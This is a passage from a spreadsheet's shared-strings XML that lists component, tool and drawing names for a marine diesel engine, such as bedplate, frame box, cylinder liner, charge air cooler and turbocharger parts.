  </si>
  <si>
    <t>EXHAUST DIFFUSOR</t>
  </si>
  <si>
    <t>HOUSING-JOURNAL BEARING</t>
  </si>
  <si>
    <t>BEARING FOR TC</t>
  </si>
  <si>
    <t>HOUSING-THRUST BEARING</t>
  </si>
  <si>
    <t>OIL PUMP-DETAILS (T.C.)</t>
  </si>
  <si>
    <t>BEARING HOUSING TURB. END</t>
  </si>
  <si>
    <t>BEARING SLEEVE BALL BRG.</t>
  </si>
  <si>
    <t>STUFFING BOX BUSHING</t>
  </si>
  <si>
    <t>SUPPORT RING</t>
  </si>
  <si>
    <t>HOUSING-SIGHT GLASS</t>
  </si>
  <si>
    <t>DETENT</t>
  </si>
  <si>
    <t>WATER CONNECTION</t>
  </si>
  <si>
    <t>FLANGE-CLEANING NOZZLE</t>
  </si>
  <si>
    <t>BLANK-ROTOR SHAFT</t>
  </si>
  <si>
    <t>BLANK-AXLE JOURNAL</t>
  </si>
  <si>
    <t>BLANK-TURBINE DISC</t>
  </si>
  <si>
    <t>TURBINE DISC</t>
  </si>
  <si>
    <t>PREROTOR</t>
  </si>
  <si>
    <t>BLANK-PREROTOR</t>
  </si>
  <si>
    <t>BLANK-TURBINE BLADE</t>
  </si>
  <si>
    <t>ROTOR BLADE</t>
  </si>
  <si>
    <t>DAMPING WIRE</t>
  </si>
  <si>
    <t>DETAIL FOR COOLER BOX</t>
  </si>
  <si>
    <t>COATING INSTRUCTION</t>
  </si>
  <si>
    <t>FRAME FOR AIR COOLER</t>
  </si>
  <si>
    <t>BRANCH HOUSING</t>
  </si>
  <si>
    <t>REVERSING CHAMBER</t>
  </si>
  <si>
    <t>SIDE CHAMBER</t>
  </si>
  <si>
    <t>TUBE PLATE, END COVER</t>
  </si>
  <si>
    <t>TUBE PLATE,REVERS.CHAMBER</t>
  </si>
  <si>
    <t>AIR COOLER INSERT</t>
  </si>
  <si>
    <t>CHARGE AIR FILTER</t>
  </si>
  <si>
    <t>CHARGE AIR COOLER</t>
  </si>
  <si>
    <t>AIR-COOL. HOUSING SEALING</t>
  </si>
  <si>
    <t>REVERSING CHAMBER-WATER</t>
  </si>
  <si>
    <t>MOUNT. OF CH. AIR COOLER</t>
  </si>
  <si>
    <t>SPRING, LEAF</t>
  </si>
  <si>
    <t>VALVE F. CH. AIR COOLER</t>
  </si>
  <si>
    <t>VENTING ARRANGEMENT</t>
  </si>
  <si>
    <t>AIRFLOW REVERSING CHAMBER</t>
  </si>
  <si>
    <t>PIPE BEND (AIR COOLER)</t>
  </si>
  <si>
    <t>SCREW GUIDE</t>
  </si>
  <si>
    <t>PACKING, AIR COOLER</t>
  </si>
  <si>
    <t>PACKING, AIR COOLER (AIR)</t>
  </si>
  <si>
    <t>PACKING, END COVER</t>
  </si>
  <si>
    <t>PACKING, REVERS. CHAMBER</t>
  </si>
  <si>
    <t>DISMOUNTING TOOLS</t>
  </si>
  <si>
    <t>PAKNING</t>
  </si>
  <si>
    <t>CLEANING PIPE</t>
  </si>
  <si>
    <t>ARR. FOR DRY CLEANING</t>
  </si>
  <si>
    <t>SHAFT OUTSIDE ENGINE</t>
  </si>
  <si>
    <t>SHAFT IN FLYWHEEL</t>
  </si>
  <si>
    <t>LIFT AT END BEARING</t>
  </si>
  <si>
    <t>BOLT FOR COUNTERWEIGHT</t>
  </si>
  <si>
    <t>BOLT FOR FLYWHEEL</t>
  </si>
  <si>
    <t>BOLT FOR CLUTCH COUPLING</t>
  </si>
  <si>
    <t>COUNTERWEIGHT FORE</t>
  </si>
  <si>
    <t>COUNTERWEIGHT AFT.</t>
  </si>
  <si>
    <t>SEALING DEVICE</t>
  </si>
  <si>
    <t>EXHAUST HEADER SUPPORT</t>
  </si>
  <si>
    <t>GLUE</t>
  </si>
  <si>
    <t>SILICONE OILS</t>
  </si>
  <si>
    <t>HOUSE</t>
  </si>
  <si>
    <t>PRESSURE HOSE</t>
  </si>
  <si>
    <t>QUICK COUPLING</t>
  </si>
  <si>
    <t>RE-CIRCULATOR</t>
  </si>
  <si>
    <t>STARTING AIR BOTTLE</t>
  </si>
  <si>
    <t>FW-PUMP</t>
  </si>
  <si>
    <t>ICS BLOWER</t>
  </si>
  <si>
    <t>BLOWER HOUSE</t>
  </si>
  <si>
    <t>MOTOR</t>
  </si>
  <si>
    <t>PULLEY</t>
  </si>
  <si>
    <t>AUX. BLOWER</t>
  </si>
  <si>
    <t>SPEC. FOR AUX. BLOWER</t>
  </si>
  <si>
    <t>SEPARATOR UNIT</t>
  </si>
  <si>
    <t>ARR. OF EXHAUST PIPE</t>
  </si>
  <si>
    <t>ARR. OF COMBUST. AIR PIPE</t>
  </si>
  <si>
    <t>AIR OUTLET ALTERNATOR</t>
  </si>
  <si>
    <t>DRIVE PULLEY</t>
  </si>
  <si>
    <t>COMPRESSOR UNIT</t>
  </si>
  <si>
    <t>EXPANSION VESSEL</t>
  </si>
  <si>
    <t>LUB.O. SEPARATOR</t>
  </si>
  <si>
    <t>TANK</t>
  </si>
  <si>
    <t>PREHEATING UNIT</t>
  </si>
  <si>
    <t>MASTER CONTROL DESK</t>
  </si>
  <si>
    <t>DISTRIBUTOR HOUSING</t>
  </si>
  <si>
    <t>BLOW-OFF PIPE</t>
  </si>
  <si>
    <t>COVER START AIR DISTRIB.</t>
  </si>
  <si>
    <t>PISTON VALVE SLIDE</t>
  </si>
  <si>
    <t>LOCKING ARM</t>
  </si>
  <si>
    <t>ROTOR</t>
  </si>
  <si>
    <t>REVERSING DISC</t>
  </si>
  <si>
    <t>DISTRIBUTOR DISC</t>
  </si>
  <si>
    <t>CLOSING DISC</t>
  </si>
  <si>
    <t>ST.AIR DISTRIB. GEARBOX</t>
  </si>
  <si>
    <t>STUD, PUSH-PULL ROD</t>
  </si>
  <si>
    <t>PUSH-PULL ROD END</t>
  </si>
  <si>
    <t>SHAFT FOR START.AIR DISTR</t>
  </si>
  <si>
    <t>COVER FOR DISTRIBUT</t>
  </si>
  <si>
    <t>BLIND COVER</t>
  </si>
  <si>
    <t>SUPPORT-FIRE EXTING.</t>
  </si>
  <si>
    <t>INJECTION NOZZLE</t>
  </si>
  <si>
    <t>TEMPERATURE MEASUREMENT</t>
  </si>
  <si>
    <t>PIPES ON ENGINE</t>
  </si>
  <si>
    <t>STATEMENT-ALTERATION</t>
  </si>
  <si>
    <t>SLEEVES WITH BSP</t>
  </si>
  <si>
    <t>SPONGE RUBBER</t>
  </si>
  <si>
    <t>SCREW CAP</t>
  </si>
  <si>
    <t>THREADED BAR</t>
  </si>
  <si>
    <t>LEVEL INDICATOR</t>
  </si>
  <si>
    <t>HELICOIL</t>
  </si>
  <si>
    <t>ADJUST. NON-RETURN VALVE</t>
  </si>
  <si>
    <t>ELEMENT F.THERMOSTATIC V.</t>
  </si>
  <si>
    <t>PIPEHOLDER F.GENERAT.COOL</t>
  </si>
  <si>
    <t>FITTINGS FOR HOLDER</t>
  </si>
  <si>
    <t>HOLDER FOR THERMOMETER</t>
  </si>
  <si>
    <t>DRIP PAN</t>
  </si>
  <si>
    <t>INTERMED.PIECE ON BEDPLAT</t>
  </si>
  <si>
    <t>THERMOSTATIC VALVE</t>
  </si>
  <si>
    <t>DIAPHRAGM SPRING VALVE</t>
  </si>
  <si>
    <t>BUTTERFLY VALVE W. ACTUA.</t>
  </si>
  <si>
    <t>CUTTING RING</t>
  </si>
  <si>
    <t>SOLENOID VALVE</t>
  </si>
  <si>
    <t>ELBOW TEES</t>
  </si>
  <si>
    <t>FLANGE FOR PIPE</t>
  </si>
  <si>
    <t>BRACE FOR PREHEATER</t>
  </si>
  <si>
    <t>BRACE F. COOL. WATER PIPE</t>
  </si>
  <si>
    <t>OIL TRAP</t>
  </si>
  <si>
    <t>3-WAY VALVE</t>
  </si>
  <si>
    <t>3-WAY VALVE WITH ACTUATOR</t>
  </si>
  <si>
    <t>OIL LEVEL GLASS</t>
  </si>
  <si>
    <t>LEAKAGE ALARM</t>
  </si>
  <si>
    <t>Air release prefilter mounted</t>
  </si>
  <si>
    <t>CADAM PART-LIST,DEP.2040</t>
  </si>
  <si>
    <t>INSTALLATION DRAWINGS</t>
  </si>
  <si>
    <t>LUB. AND COOLING OIL</t>
  </si>
  <si>
    <t>ENGINE COOLING, SEAWATER</t>
  </si>
  <si>
    <t>EXT.PIPE CONNECTIONS ETC.</t>
  </si>
  <si>
    <t>ENGINE BRACING</t>
  </si>
  <si>
    <t>ENGINE HOLDING-DOWN BOLT</t>
  </si>
  <si>
    <t>ENGINE SIDE-CHOCKS</t>
  </si>
  <si>
    <t>ENGINE END-CHOCKS</t>
  </si>
  <si>
    <t>HD BOLT F.TANKT.LESS PADS</t>
  </si>
  <si>
    <t>MISC. SPARE PARTS</t>
  </si>
  <si>
    <t>ENGINE PIPE DIAGRAMS</t>
  </si>
  <si>
    <t>ENGINE DATA</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATION</t>
  </si>
  <si>
    <t>CAMSHAFT LUBRICATION</t>
  </si>
  <si>
    <t>SCAVENGE AIR</t>
  </si>
  <si>
    <t>ENGINE COOLING,FRESHWATER</t>
  </si>
  <si>
    <t>CENTRAL COOLING  NO 1</t>
  </si>
  <si>
    <t>CENTRAL COOLING  NO 2</t>
  </si>
  <si>
    <t>MANOEVRING SYSTEM</t>
  </si>
  <si>
    <t>BRIDGE CONTROL</t>
  </si>
  <si>
    <t>ENGINE INSTRUMENTATION</t>
  </si>
  <si>
    <t>ALARM AND SAFETY DEVICES</t>
  </si>
  <si>
    <t>COMPRESSED AIR</t>
  </si>
  <si>
    <t>AIR COOLER CLEANING</t>
  </si>
  <si>
    <t>ENGINE CONNECTIONS</t>
  </si>
  <si>
    <t>SHAFT LINE</t>
  </si>
  <si>
    <t>ENGINE ROOM CRANE</t>
  </si>
  <si>
    <t>ENGINE TOOLS</t>
  </si>
  <si>
    <t>REQ. SPACE F. MAIN ENGINE</t>
  </si>
  <si>
    <t>ENGINE PAINT</t>
  </si>
  <si>
    <t>SHOP TRIAL</t>
  </si>
  <si>
    <t>EXHAUST GAS</t>
  </si>
  <si>
    <t>ENGINE GALLERY ARR.</t>
  </si>
  <si>
    <t>MAIN AND AUX. ENGINE SYS.</t>
  </si>
  <si>
    <t>TOP BRACING OF ENGINE</t>
  </si>
  <si>
    <t>GASKETS,SEALINGS,O-RINGS</t>
  </si>
  <si>
    <t>JACKET COOLING SYSTEM</t>
  </si>
  <si>
    <t>ENGINE SEATING</t>
  </si>
  <si>
    <t>ENGINE SUPPORTING CHOCKS</t>
  </si>
  <si>
    <t>STATIC THRUST SHAFT LOAD</t>
  </si>
  <si>
    <t>PTO SYSTEM</t>
  </si>
  <si>
    <t>TCS/PTO/PTI/ SYSTEM</t>
  </si>
  <si>
    <t>TORSIOGRAPH ARRANGEMENT</t>
  </si>
  <si>
    <t>EARTHING DEVICE</t>
  </si>
  <si>
    <t>INSTALLATION DRAWINGS-A</t>
  </si>
  <si>
    <t>INSTALLATION DRAWINGS-B</t>
  </si>
  <si>
    <t>PROJECT DOCUMENTATION</t>
  </si>
  <si>
    <t>ENGINE</t>
  </si>
  <si>
    <t>SHOPTRIAL AND SEATRIAL</t>
  </si>
  <si>
    <t>AUXILIARY EQUIPMENT</t>
  </si>
  <si>
    <t>MODIFICATION DRAWING</t>
  </si>
  <si>
    <t>SPARE PARTS OUTLINE</t>
  </si>
  <si>
    <t>MOUNTING OF SPARE PARTS</t>
  </si>
  <si>
    <t>SPECIAL DESIGN-WELD.VERS.</t>
  </si>
  <si>
    <t>MAIN LIST A</t>
  </si>
  <si>
    <t>MAIN LIST B</t>
  </si>
  <si>
    <t>MAIN LIST C</t>
  </si>
  <si>
    <t>PIPING ARRANGEMENT LIST</t>
  </si>
  <si>
    <t>TOOL LIST</t>
  </si>
  <si>
    <t>TURBOCHARGER ARR. LIST</t>
  </si>
  <si>
    <t>GEN.INSTRUCTIONS/PLANT</t>
  </si>
  <si>
    <t>DRAWINGS FOR SUB-SUPLIERS</t>
  </si>
  <si>
    <t>ENGINE ROOM ARRANGEMENT</t>
  </si>
  <si>
    <t>ENG. MOUNT.</t>
  </si>
  <si>
    <t>FOLL. PARTS</t>
  </si>
  <si>
    <t>T+P ARR.</t>
  </si>
  <si>
    <t>BEDPLATE-COMPLETE</t>
  </si>
  <si>
    <t>BEDPLATE - INTERMEDIATE</t>
  </si>
  <si>
    <t>BEDPLATE-INTERM.-WELDING</t>
  </si>
  <si>
    <t>END CROSS GIRDER</t>
  </si>
  <si>
    <t>BEDPLATE-WELDED</t>
  </si>
  <si>
    <t>BEDPLATE-FORE-WELDING</t>
  </si>
  <si>
    <t>BEDPLATE-FORE-MACHINING</t>
  </si>
  <si>
    <t>BEDPL.INTERM.FORE</t>
  </si>
  <si>
    <t>BEDPL.INTERM.AFT-WELDING</t>
  </si>
  <si>
    <t>BEDPLATE-AFT-WELDING</t>
  </si>
  <si>
    <t>BEDPLATE-AFT-MACHINING</t>
  </si>
  <si>
    <t>PLATE LISTS-CUTTING PLANS</t>
  </si>
  <si>
    <t>MOUNT. OF AX. VIBR.DAMPER</t>
  </si>
  <si>
    <t>MOUNT.OF AX.VIBR.MONITOR</t>
  </si>
  <si>
    <t>PROXIMETER 11 MM</t>
  </si>
  <si>
    <t>RUN-OUT METER 8 MM</t>
  </si>
  <si>
    <t>RUN-OUT METER 11 MM</t>
  </si>
  <si>
    <t>WEB PLATE COMPLETE</t>
  </si>
  <si>
    <t>FACE COMPLETE</t>
  </si>
  <si>
    <t>OIL GROOVE</t>
  </si>
  <si>
    <t>MAIN BEARING, NON-STD</t>
  </si>
  <si>
    <t>MAIN BEARING, ASSEMBLY</t>
  </si>
  <si>
    <t>GUIDE BEARING COMPLETE</t>
  </si>
  <si>
    <t>LUB.OIL PIPE COMPLETE</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-MAIN BEARING</t>
  </si>
  <si>
    <t>JOURNAL BEARING COMPLETE</t>
  </si>
  <si>
    <t>LUB.OIL PIPE,JOURNAL BRG.</t>
  </si>
  <si>
    <t>OIL PAN-FORE</t>
  </si>
  <si>
    <t>OIL PAN-AFT</t>
  </si>
  <si>
    <t>SOUNDING PIPE</t>
  </si>
  <si>
    <t>COOLING OIL PIPE</t>
  </si>
  <si>
    <t>COOLING OIL PIPE-DETAILS</t>
  </si>
  <si>
    <t>LUB.OIL SUCTION PIPE</t>
  </si>
  <si>
    <t>TOP FLANGE-COMPLETE</t>
  </si>
  <si>
    <t>LEVEL ALARM</t>
  </si>
  <si>
    <t>BEDPLATE SHORT</t>
  </si>
  <si>
    <t>FRONT PLATE ASSEMBLY</t>
  </si>
  <si>
    <t>HOLDING DOWN BOLTS ARR.</t>
  </si>
  <si>
    <t>BEDPLATE MACHINED</t>
  </si>
  <si>
    <t>HOLDER FOR DIP STICK</t>
  </si>
  <si>
    <t>BEARING CRUSH MEASURING</t>
  </si>
  <si>
    <t>HYDR.JACK AX.VIBR.DAMPER</t>
  </si>
  <si>
    <t>LIFT.TOOL FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>PULLEY F.WIRE F.MAIN BRG.</t>
  </si>
  <si>
    <t>WIRE GUIDE - MAIN BEARING</t>
  </si>
  <si>
    <t>WIRE GUIDE-JOURN.BEARING</t>
  </si>
  <si>
    <t>GUIDE SHELL-MAIN BEARING</t>
  </si>
  <si>
    <t>LIFT.TOOL MAIN BRG. SHELL</t>
  </si>
  <si>
    <t>HYDR.TOOL F. MAIN BEARING</t>
  </si>
  <si>
    <t>WIRE F.DISM.,MAINB.SHEEL.</t>
  </si>
  <si>
    <t>HANDLE, DISM. M.BRG SHELL</t>
  </si>
  <si>
    <t>MOUNT.TOOL,THIN BRG.SHELL</t>
  </si>
  <si>
    <t>COVER FOR OIL DRAIN</t>
  </si>
  <si>
    <t>TOOLS-ALIGNM.OF BEDPLATE</t>
  </si>
  <si>
    <t>LIFTING TOOL FOR AVD</t>
  </si>
  <si>
    <t>MEAS.TOOL-M.BRG.CLEARANCE</t>
  </si>
  <si>
    <t>ASSEMBLY OF STUDS</t>
  </si>
  <si>
    <t>LIFTING OF BEDPLATE FORE</t>
  </si>
  <si>
    <t>LIFTING OF BEDPLATE AFT</t>
  </si>
  <si>
    <t>HYDR.JACK MAIN BEARING</t>
  </si>
  <si>
    <t>DRILLING MACHINE PIPING</t>
  </si>
  <si>
    <t>DRILL.MACH.FOUND.BOLT HOL</t>
  </si>
  <si>
    <t>PULL.YOKE F.DRILLING MACH</t>
  </si>
  <si>
    <t>PLAC.OF BRACK. ON B.FRAME</t>
  </si>
  <si>
    <t>PLAC. OF BRACKET</t>
  </si>
  <si>
    <t>FOUNDATION COMPLETE</t>
  </si>
  <si>
    <t>BOX FOR LEVEL ALARM</t>
  </si>
  <si>
    <t>BRACKET WELD</t>
  </si>
  <si>
    <t>ASS. OF HOLDING DOWN BOLT</t>
  </si>
  <si>
    <t>BRACKET FOR CONICAL</t>
  </si>
  <si>
    <t>FOUNDATION FRAME WELDED</t>
  </si>
  <si>
    <t>DIPSTICK COMPLETE</t>
  </si>
  <si>
    <t>BASE FRAME MACHINED</t>
  </si>
  <si>
    <t>BACK STOP</t>
  </si>
  <si>
    <t>MOUNT.OF ELAST.FOUNDATION</t>
  </si>
  <si>
    <t>MOUNT. OF LEVEL ALARM</t>
  </si>
  <si>
    <t>PLATES</t>
  </si>
  <si>
    <t>OIL PAN WELDED</t>
  </si>
  <si>
    <t>BRACKET F. LUB.OIL FILTER</t>
  </si>
  <si>
    <t>BRACKET FOR GENERATOR</t>
  </si>
  <si>
    <t>FOUNDATIONRAIL - WELDED</t>
  </si>
  <si>
    <t>ANALOG LEVEL INDICATOR</t>
  </si>
  <si>
    <t>FRAME UNIT COMPLETE</t>
  </si>
  <si>
    <t>FRAME SECTION AFT</t>
  </si>
  <si>
    <t>HOW MANY DRG</t>
  </si>
  <si>
    <t>CONNECTING BOX-PMI SYSTEM</t>
  </si>
  <si>
    <t>ASSY OF PMI EQUIPMENT</t>
  </si>
  <si>
    <t>A-FRAME COMPLETE</t>
  </si>
  <si>
    <t>END FRAME FORE COMPLETE</t>
  </si>
  <si>
    <t>INTERM.FRAME-COMPLETE</t>
  </si>
  <si>
    <t>BRACING PLATE</t>
  </si>
  <si>
    <t>FOOT FLANGE COMPLETE</t>
  </si>
  <si>
    <t>STAY BOLT TUBE COMPLETE</t>
  </si>
  <si>
    <t>MOUNT.OF LATERAL GUIDES</t>
  </si>
  <si>
    <t>FRAME-BEDPLATE</t>
  </si>
  <si>
    <t>DRAIN</t>
  </si>
  <si>
    <t>FR.GIRDER COMPL.CAM.-FORE</t>
  </si>
  <si>
    <t>FR.GIRDER COMPL.CAM.-AFT</t>
  </si>
  <si>
    <t>FR.GIRDER COMPL.EXH.-FORE</t>
  </si>
  <si>
    <t>FRAME GIRDER-AFT</t>
  </si>
  <si>
    <t>FRAME BOX COMPLETE-FORE</t>
  </si>
  <si>
    <t>FRAME BOX COMPLETE-AFT</t>
  </si>
  <si>
    <t>MOUNTING OF HINGES</t>
  </si>
  <si>
    <t>FRAME BOX COMPLETE</t>
  </si>
  <si>
    <t>FR.GIRDER-CAMSH.SIDE-FORE</t>
  </si>
  <si>
    <t>FR.GIRDER-CAMSH.SIDE-AFT</t>
  </si>
  <si>
    <t>FR.GIRDER-EXH.SIDE-FORE</t>
  </si>
  <si>
    <t>FR.GIRDER-EXH.SIDE-AFT</t>
  </si>
  <si>
    <t>COVER - FORE END</t>
  </si>
  <si>
    <t>COVER - UPPER PART</t>
  </si>
  <si>
    <t>COVER - LOWER PART</t>
  </si>
  <si>
    <t>LOWER FRAME BOX-FORE</t>
  </si>
  <si>
    <t>LOWER FRAME BOX-AFT</t>
  </si>
  <si>
    <t>FRAME COMPLETE</t>
  </si>
  <si>
    <t>FRAME WITH MAIN BEARINGS</t>
  </si>
  <si>
    <t>FRAMEBOX,CYL.UNIT,WELDING</t>
  </si>
  <si>
    <t>FRAMEBOX,CHAIN,WELDING</t>
  </si>
  <si>
    <t>FR.BOX,DIVISION,WELDING</t>
  </si>
  <si>
    <t>FRAMEBOX,CHAIN,MACHINING</t>
  </si>
  <si>
    <t>FRAME BOX-WELDING</t>
  </si>
  <si>
    <t>FRAME BOX - MACHINING</t>
  </si>
  <si>
    <t>FRAME BOX-FORE-WELDING</t>
  </si>
  <si>
    <t>FRAME BOX-FORE-MACHINING</t>
  </si>
  <si>
    <t>FRAME BOX-AFT-WELDING</t>
  </si>
  <si>
    <t>FRAME BOX-AFT-MACHINING</t>
  </si>
  <si>
    <t>INTERMEDIATE PLATE COMPL.</t>
  </si>
  <si>
    <t>FRAME BOX-INTERM.</t>
  </si>
  <si>
    <t>FR.BOX-INTERM.-FORE-WELD.</t>
  </si>
  <si>
    <t>FR.BOX-INTERM.-AFT-WELD.</t>
  </si>
  <si>
    <t>TOP FLANGE COMPLETE</t>
  </si>
  <si>
    <t>SIDE WALL COMPLETE</t>
  </si>
  <si>
    <t>MOUNTING OF DRAIN PIPE</t>
  </si>
  <si>
    <t>STAY BOLT-COMPLETE</t>
  </si>
  <si>
    <t>ASSEMBLING OF STAY BOLT</t>
  </si>
  <si>
    <t>SUPPORT PIECE F.STAY BOLT</t>
  </si>
  <si>
    <t>STAY BOLT SELECTION</t>
  </si>
  <si>
    <t>STAY BOLT-UPPER COMPLETE</t>
  </si>
  <si>
    <t>MOUNTING OF BRACING STUDS</t>
  </si>
  <si>
    <t>SCAVENGE BOX</t>
  </si>
  <si>
    <t>SCAVENGE BOX-COMPLETE</t>
  </si>
  <si>
    <t>SEALING RING-MOUNTING</t>
  </si>
  <si>
    <t>SHIELD-COMPLETE</t>
  </si>
  <si>
    <t>GUIDE BEARING-MOUNTING</t>
  </si>
  <si>
    <t>MOUNTING OF MAIN BEARING</t>
  </si>
  <si>
    <t>MOUNT.OF SHIELD COMPLETE</t>
  </si>
  <si>
    <t>TEFLON RING</t>
  </si>
  <si>
    <t>FRAME ASSEMBLY</t>
  </si>
  <si>
    <t>MOUNTING OF COOL.W.NIPPLE</t>
  </si>
  <si>
    <t>GUIDE F. HYDR. PULL TOOL</t>
  </si>
  <si>
    <t>DISM.TOOL F.MAIN BRG.CAP</t>
  </si>
  <si>
    <t>LIFTING OF FRAME BOX</t>
  </si>
  <si>
    <t>LIFT.ATTACHMT.F.FRAME BOX</t>
  </si>
  <si>
    <t>MILLING UNIT ERECTION</t>
  </si>
  <si>
    <t>FIXED MILLING BRACKET</t>
  </si>
  <si>
    <t>HYDRAULIC NUT F.STAYBOLT</t>
  </si>
  <si>
    <t>HYDRAULIC NUT, PIPING</t>
  </si>
  <si>
    <t>SPARE PARTS FOR HYDR. NUT</t>
  </si>
  <si>
    <t>HYDR.JACK STAYBOLT</t>
  </si>
  <si>
    <t>HEATING ROD</t>
  </si>
  <si>
    <t>TOOLS FOR MS-104</t>
  </si>
  <si>
    <t>TOOLS FOR MS-102</t>
  </si>
  <si>
    <t>FRAME/MAIN BEARING COMPL.</t>
  </si>
  <si>
    <t>FRAME COMPL.</t>
  </si>
  <si>
    <t>FRAME FORM AND POS. TOL.</t>
  </si>
  <si>
    <t>PIPES F. THERMAL SENSORS</t>
  </si>
  <si>
    <t>MOUNT. OF SHIELD COMPLETE</t>
  </si>
  <si>
    <t>COVER WITH PIPE BOTTOM</t>
  </si>
  <si>
    <t>CHAIN DRIVE UPPER PART</t>
  </si>
  <si>
    <t>INTERMEDIATE FRAME MOUNT.</t>
  </si>
  <si>
    <t>INTERM.FRAME WITH GUARD</t>
  </si>
  <si>
    <t>CHAINWHEEL FRAME W.COVER</t>
  </si>
  <si>
    <t>BEARING HOUSING-MOUNTING</t>
  </si>
  <si>
    <t>CONNECTION PIPE</t>
  </si>
  <si>
    <t>TOP GUARD-MOUNTING</t>
  </si>
  <si>
    <t>OIL SEPARATOR</t>
  </si>
  <si>
    <t>VENT CAP</t>
  </si>
  <si>
    <t>MOUNTING OF GUARD</t>
  </si>
  <si>
    <t>SCRAPER RING COMPLETE</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING-CPL.</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING-UPP.</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING-LOW.</t>
  </si>
  <si>
    <t>OIL SEAL COVER-COMPLETE</t>
  </si>
  <si>
    <t>OIL THROW RING-COMPLETE</t>
  </si>
  <si>
    <t>MOUNTING OF OIL SEAL</t>
  </si>
  <si>
    <t>FOOT STRIP</t>
  </si>
  <si>
    <t>GUARDS-BOTTOM COMPLETE</t>
  </si>
  <si>
    <t>OIL GUARD</t>
  </si>
  <si>
    <t>SHIELD UPPER, WELDING</t>
  </si>
  <si>
    <t>SHIELD LOWER, WELDING</t>
  </si>
  <si>
    <t>GUARD-UPPER PART</t>
  </si>
  <si>
    <t>GUARD COMPLETE</t>
  </si>
  <si>
    <t>ARR.OF GUARDS</t>
  </si>
  <si>
    <t>ARR.OF OIL PIPE</t>
  </si>
  <si>
    <t>GUARDS-MOUNTING</t>
  </si>
  <si>
    <t>CRANKCASE COVER</t>
  </si>
  <si>
    <t>COVER WITH RUBBER HOSE</t>
  </si>
  <si>
    <t>MOUNTING OF HANDLE</t>
  </si>
  <si>
    <t>VENT FILTER</t>
  </si>
  <si>
    <t>OIL SEAL</t>
  </si>
  <si>
    <t>COVER W. RUBBER HOSE</t>
  </si>
  <si>
    <t>CRANKC.COV.W.SAFETY VALVE</t>
  </si>
  <si>
    <t>COVER WITH FILLER PIPE</t>
  </si>
  <si>
    <t>COVER COMPLETE</t>
  </si>
  <si>
    <t>COVER WITH FILLER PLUG</t>
  </si>
  <si>
    <t>MOUNT. OF THERMAL SENSORS</t>
  </si>
  <si>
    <t>COVER W. PIPE BOTTOM</t>
  </si>
  <si>
    <t>COVER WITH SAFETY VALVE</t>
  </si>
  <si>
    <t>MOUNT. OF COVER COMPL.</t>
  </si>
  <si>
    <t>ARR.OF PISTON CLEAN. RING</t>
  </si>
  <si>
    <t>CYLINDER LINER + PC RING</t>
  </si>
  <si>
    <t>TOP UNIT COMPLETE</t>
  </si>
  <si>
    <t>TOP UNIT</t>
  </si>
  <si>
    <t>CHAINDRIVE PART</t>
  </si>
  <si>
    <t>CYLINDER PART</t>
  </si>
  <si>
    <t>HOLDER-CYL.LINER</t>
  </si>
  <si>
    <t>LIFT.TOOL F.RELIEF VALVE</t>
  </si>
  <si>
    <t>CYL.FRAME ASSEMB.+MACHIN.</t>
  </si>
  <si>
    <t>ARR. OF STUDS</t>
  </si>
  <si>
    <t>INJECTION PIPE</t>
  </si>
  <si>
    <t>MOUNT.OF COOL.WATER CONN.</t>
  </si>
  <si>
    <t>MOUNTING,NON-RETURN VALVE</t>
  </si>
  <si>
    <t>NON-RETURN VALVE ASSY</t>
  </si>
  <si>
    <t>CLEANING COVER COMPLETE</t>
  </si>
  <si>
    <t>BRACING IN CAMSH. HOUSING</t>
  </si>
  <si>
    <t>CYLINDER UNIT COMPLETE</t>
  </si>
  <si>
    <t>COOLING JACKETS-MOUNTING</t>
  </si>
  <si>
    <t>GUIDE FOR CHAIN</t>
  </si>
  <si>
    <t>WIRE F. LIFTING CYL.LINER</t>
  </si>
  <si>
    <t>MEASURING TOOL F. CYL.LIN</t>
  </si>
  <si>
    <t>CROSS BAR FOR CYL.LINER</t>
  </si>
  <si>
    <t>CLEANING TOOLS</t>
  </si>
  <si>
    <t>RETAINING TOOL-CYL. LINER</t>
  </si>
  <si>
    <t>COLLAR RING FOR CYL.LINER</t>
  </si>
  <si>
    <t>LIFT.TOOL-CYL.LINER(PART)</t>
  </si>
  <si>
    <t>GRINDING HANDLE</t>
  </si>
  <si>
    <t>TURNBUCKLE</t>
  </si>
  <si>
    <t>LIFT.OF TOP SECTION FORE</t>
  </si>
  <si>
    <t>LIFT.OF TOP SECTION AFT</t>
  </si>
  <si>
    <t>JIG+DRAWING TOOL</t>
  </si>
  <si>
    <t>WEAR RIDGE MILL. MACHINE</t>
  </si>
  <si>
    <t>TOOLS FOR MS-105</t>
  </si>
  <si>
    <t>CYLINDER COVER SPEC. EXEC</t>
  </si>
  <si>
    <t>WELDING INSTRUCTION</t>
  </si>
  <si>
    <t>PIPE SYSTEM</t>
  </si>
  <si>
    <t>MOUNTING OF SEALING RING</t>
  </si>
  <si>
    <t>SPRING HOUSING COMPLETE</t>
  </si>
  <si>
    <t>SLEEVE COMPL.START.VALVE</t>
  </si>
  <si>
    <t>STUD, STARTING VALVE ASSY</t>
  </si>
  <si>
    <t>SLEEVE-SAFETY VALVE,ASSY</t>
  </si>
  <si>
    <t>STUD, SAFETY VALVE</t>
  </si>
  <si>
    <t>SLEEVE-INDICATOR VALVE</t>
  </si>
  <si>
    <t>STUD, INDICATOR VALVE</t>
  </si>
  <si>
    <t>SLEEVE FOR COOLING WATER</t>
  </si>
  <si>
    <t>CYLINDER COVER ASSEMBLY</t>
  </si>
  <si>
    <t>GRIND.TOOL-FUEL VALV.SEAT</t>
  </si>
  <si>
    <t>GRIND.TOOL-ST.VALVE SEAT</t>
  </si>
  <si>
    <t>CYLINDER COVER RACK</t>
  </si>
  <si>
    <t>LIFTING TOOL F.CYL.COVER</t>
  </si>
  <si>
    <t>MOUNT.TOOL-VALVE SEAT</t>
  </si>
  <si>
    <t>EXTRACTOR-VALVE SEAT RING</t>
  </si>
  <si>
    <t>LIFTING TOOL-CYL.COVER</t>
  </si>
  <si>
    <t>FRAME - TILTING TABLE</t>
  </si>
  <si>
    <t>TILTING TABLE</t>
  </si>
  <si>
    <t>TILTING TABLE WITH FRAME</t>
  </si>
  <si>
    <t>LIFT.TOOL CYL.COVER/LINER</t>
  </si>
  <si>
    <t>JIG</t>
  </si>
  <si>
    <t>HYDR.JACK CYL.COVER</t>
